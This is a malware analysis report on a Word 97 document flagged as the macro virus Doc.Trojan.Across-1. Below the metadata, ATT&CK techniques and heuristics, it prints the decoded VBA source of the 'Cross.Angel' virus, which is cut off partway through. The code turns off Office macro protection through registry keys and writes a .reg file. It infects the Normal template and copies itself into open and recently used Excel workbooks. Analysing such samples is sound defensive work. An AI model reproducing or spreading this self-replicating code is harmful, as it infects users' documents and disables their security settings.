Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 21c2a0b5f6570004…

MALICIOUS

Office (OLE)

Size: 43.5 KB
Created: 2000-08-18 20:35:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 21f47ed35730379a40577271c990f4e8
SHA-1: 74255330221329a0ac0139c5a1d244012dbc1e7d
SHA-256: 21c2a0b5f65700047093e1d54a9e69199fbb16231126e4e161c99a05f6d3d993
Risk Score: 280

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros that attempt to disable security settings and inject code into the Normal template, likely for persistence. The script also attempts to modify registry keys related to Office security. The ClamAV detection 'Doc.Trojan.Across-1' further supports its malicious nature.

Heuristics (5)

  • ClamAV: Doc.Trojan.Across-1 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Across-1
  • VBA macros detected [medium; 3 related findings; OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical; OLE_VBA_SHELL]
    The macro code invokes Shell()
  • CreateObject call [high; OLE_VBA_CREATEOBJ]
    The macro code invokes CreateObject()
  • GetObject call [high; OLE_VBA_GETOBJ]
    The macro code invokes GetObject()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 27389 bytes
SHA-256: 1d9f1aef9377d9e3752be7a7c31bb63929266a267a2a3ed51d4e238e17a38499
Detection: ClamAV: Doc.Trojan.Across-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Cross.Angel
Private Sub Document_Close()
On Error Resume Next
Const ž»§–Ê = "' Cross.Angel", …·µ¶Š = 130, ‡š…©® = "9.0", ª’¼¹® = "Macro", »–Šš¦ = "Tools", µžŠª¯ = &H1, µžŠª¯_ = &H0, ¸‡Â”“ = 0, ª¾±³· = 1, „©¶° = 12, ·˜¯¨¦ = "excel.application", ȇ‰ƒ· = "DieseArbeitsmappe"
If Application.Version = ‡š…©® Then
    Application.CommandBars(ª’¼¹®).Controls((ª¾±³· + ª¾±³· + ª¾±³·)).Enabled = (Rnd * ¸‡Â”“)
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = µžŠª¯
Else
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = µžŠª¯_
    Application.CommandBars(»–Šš¦).Controls(„©¶°).Enabled = (Rnd * ¸‡Â”“)
    Options.VirusProtection = (Rnd * ¸‡Â”“)
End If
Options.SaveNormalPrompt = (Rnd * ¸‡Â”“)
È¹Ž±¦ = ½‘ˆ²†(ThisDocument.VBProject.VBComponents(ª¾±³·).CodeModule.Lines(ª¾±³·, …·µ¶Š))
If MacroContainer = ActiveDocument Then Set ÈŽ‡Œ” = NormalTemplate Else Set ÈŽ‡Œ” = ActiveDocument
With ÈŽ‡Œ”.VBProject.VBComponents(ª¾±³·).CodeModule
    If .Lines(ª¾±³·, ª¾±³·) <> ž»§–Ê Then
        .DeleteLines ª¾±³·, .CountOfLines
        .InsertLines ª¾±³·, È¹Ž±¦
        If ÈŽ‡Œ” = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName
    End If
End With
If System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") <> ª¾±³· Then
Set ÈÅ”›² = GetObject(, ·˜¯¨¦)
If ÈÅ”›² = "" Then Set ÈÅ”›² = CreateObject(·˜¯¨¦): ˆŽ£È« = ª¾±³·
If ˆŽ£È« <> ª¾±³· Then
    For Each À˜Êƒˆ In ÈÅ”›².Workbooks
       With À˜Êƒˆ.VBProject.VBComponents(ȇ‰ƒ·).CodeModule
            If .Lines(ª¾±³·, ª¾±³·) <> ž»§–Ê Then
                .DeleteLines ª¾±³·, .CountOfLines
                .InsertLines ª¾±³·, È¹Ž±¦
                If À˜Êƒˆ.Path <> "" Then À˜Êƒˆ.Save Else À˜Êƒˆ.SaveAs À˜Êƒˆ.FullName
            End If
        End With
    Next
Else
    For À˜Êƒˆ = ª¾±³· To ÈÅ”›².Application.RecentFiles.Maximum
        ÈÅ”›².Application.RecentFiles(À˜Êƒˆ).Open
            With ÈÅ”›².Application.Workbooks(Application.RecentFiles(1).Name).VBProject.VBComponents(ȇ‰ƒ·).CodeModule
                If .Lines(ª¾±³·, ª¾±³·) <> ž»§–Ê Then
                    .DeleteLines ª¾±³·, .CountOfLines
                    .InsertLines ª¾±³·, È¹Ž±¦
                End If
            End With
        ÈÅ”›².Application.Workbooks(Application.RecentFiles(1).Name).Close ª¾±³·
    Next
    ÈÅ”›².Quit
End If
System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") = ª¾±³·
End If
If Minute(Now()) = Int(Rnd * 60) + 1 Then MsgBox "Why I lost my angel? Can't live without you!", vbQuestion, "Cross.Angel by jackie-/Lz0NT/MVT"
If System.PrivateProfileString("c:\.ini", "Carinthia", "Word") <> ª¾±³· Then System.PrivateProfileString("c:\.ini", "Carinthia", "Word") = ª¾±³·
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Const ž»§–Ê = "' Cross.Angel", …·µ¶Š = 130, ‡š…©® = "9.0", ª’¼¹® = "Macro", »–Šš¦ = "Tools", ¸‡Â”“ = 0, ª¾±³· = 1, „©¶° = 10, ·˜¯¨¦ = "word.application", ȇ‰ƒ· = "DieseArbeitsmappe"
If UCase(Dir("c:\.reg")) <> ".REG" Then
Open "c:\.reg" For Output As #1
    Print #1, "REGEDIT4"
If Application.Version = ‡š…©® Then
    Application.CommandBars(ª’¼¹®).Controls((ª¾±³· + ª¾±³· + ª¾±³·)).Enabled = (Rnd * ¸‡Â”“)
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
    Print #1, """Level""=dword:00000001"
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
    Print #1, """Level""=dword:00000001"
Else
    Application.CommandBars(»–Šš¦).Controls(„©¶°).Enabled = (Rnd * ¸‡Â”“)
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
    Print #1, """Options6""=dword:00000000"
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Wor
... (truncated)